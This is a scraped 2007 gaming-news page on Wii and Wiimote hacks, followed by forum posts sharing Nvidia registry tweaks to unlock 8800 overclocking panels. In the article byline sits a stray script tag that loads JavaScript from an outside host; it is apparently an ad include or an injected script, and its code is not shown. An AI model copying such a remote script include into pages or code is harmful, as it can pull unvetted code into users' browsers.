More Wii Hacks Emerge

"GAMES NEWS has trickled out over Christmas, with the industry focused on sales rather than product launches and important news releases. A few interesting hacks have emerged; read on to find out more..."

Search News

  • Scrolling Image
News <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 02/01/2007
Author: PV5150
Source: The Inquirer

Wii Logo

Wiimote hacks are coming thick and fast, with the device becoming the choice of input on multiple different platforms - WoW on the PC is one new development, but more oddly is a hack involving a Roomba vacuum cleaner , a remote controlled car , and a home entertainment control system using the Wii Opera web browser.

Someone's even hacked the Wii classic controller to place the cable at the top of the pad, as opposed to the bottom. Alternatively you could purchase a Gamecube controller.

If you fancy using iTunes on your Wii, for whatever reason, head over here for an overview of how to get iTunes streaming from your PC/Mac for playback on your Wii, using 'dot.Tunes'.

It seems there is little left to hack on the Wii - ISOs are already in the wild, courtesy of pirate group Paradox. The Red Steel ISO was the first to released, but there are no ways to playback the copied game - yet ( OC3D in no way condones software piracy or copyright infringement).

Feel free to discuss this article in our forum

«Prev 1 Next»

Most Recent Comments

01-01-2007, 16:12:41

Toxcity

Bah I meant nTune soz



Tried that!
You have an 8800 what have you done? Did it work straight off for you? :)

01-01-2007, 16:18:11

Ham
What make is your 8800?

If i recall kemp had trouble with the Asus GTX but the XFX GTS worked out the box?

01-01-2007, 16:24:34

Toxcity
Its a palit.. :D
I have heard bad things about Palit but Jeezes this thing rules! ;)

And for the price WoOt!
Anyhoo... Yeah palit.. :)

01-01-2007, 16:42:02

Kempez
Well when I installed the drivers I had nothing in the control panel at all. This was when switching from 7900 > 8800

I just repaired windows

01-01-2007, 17:19:56

Mullet

I know. I installed it and it still doesn't work.. :(



What drivers u on??? Try 97.02s... the oc utility should then appear...

Nvidia have apparently blocked this 'smell the burn' OC'ing utility hence you have to use the odler 97.02s

:wavey:

01-01-2007, 19:30:55

Pyr0
try this,

copy this into a text file and save it with a .reg extension

Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation\Global\NvCplApi\Policies]
"ContextUIPolicy"=dword:00000002
"TaskbarUIPolicy"=dword:00000002
"CplGroupUIPolicy"=dword:00000002
"ModePersist_GPU:0_Mode:0"=hex:d0,a6,63,02,10,00,00,00,00,00,00,00,00,00,00,00,\
05,00,00,00,00,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00
"SedonaDisable"=dword:00000002

REGEDIT4

; =======================
; Coolbits 2
; >> Installation File
; =======================

[HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation\Global\NVTweak]
"NvCplExposeWin2kDualView"=dword:00000001
"NvCplTvLocaleAutoDetect"=dword:00000001
"NvCplAllowForceTVDetection"=dword:00000001
"NvCplEnableActiveApp"=dword:00000001
"DisableApplyColorsAtStartup"=dword:00000000
"NoMenus"=dword:00000000
"OverlayPageState"=dword:00000000
"CinematicPageState"=dword:000000ff
"NvCplThermalSettings"=dword:00000020
"NvCplEnableScreenMenuPage"=dword:00000001
"NvCplCustomResConfig"=dword:00000000
"NvCplEnableAdditionalInfoPage"=dword:00000001
"NvCplDisablePerfQualPage"=hex:00,00,00,00
"NvCplEnableAGPSettingsPage"=dword:00000001
"CoolBits"=dword:ffffffff
"NvCplEnableOverlaySpanControl"=dword:00000001
"TwinViewCapsOverride"=dword:00000001
"NvCplEnableDesktopOverlapPage"=dword:00000001
"NvCplEnableTroubleshootingPage"=dword:00000001
"NvCplDisableRefreshRatePage"=dword:00000000
"NvCplDisableRotateAngles"=dword:00000000
"NoPages"=dword:00000000
"NvCplEnableClearViewPage"=dword:00000001
"NvCplEnableFanControl"=dword:00000003
"NvCplEnableFrameSyncPage"=dword:00000001
"NvCplEnableHardwarePage"=dword:00000001
"NvCplEnablenForcePage"=dword:00000001
"NvCplEnablePwrMzrOnDesktopMenu"=dword:00000001
"NvCplEnableRotationColorSettings"=dword:00000001
"NvCplNvThermPage"=dword:00000001
"PowermizerPreferences"=dword:00000000
"QTwkEnableModeChangeWarning"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation\Global\OpenGL]

[HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation\Global\OpenGL\Debug]
"ShaderObjects"=dword:00000001


after adding it to the registry, you should find if you use the classic control panel, the overclocking and temperature panels are available again with the 8800 cards ;)

01-01-2007, 21:37:05

Toxcity
It keeps saying "you can only iprot binary blah blah" into the reg!? :eek:

01-01-2007, 21:47:12

Pyr0
hmm... not sure what's wrong there, it imported fine when i tried it with the 97.44 drivers *shrug*

i've uploaded the one that works for me, here:
http://www.overclock247.com/pyr0/8800/

01-01-2007, 21:51:22

Toxcity
Sorted cheers Pyro! ;)

I must of done something spazz!

01-01-2007, 22:26:37

Pyr0
hehe, no probs m8
glad it's working for you :)
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.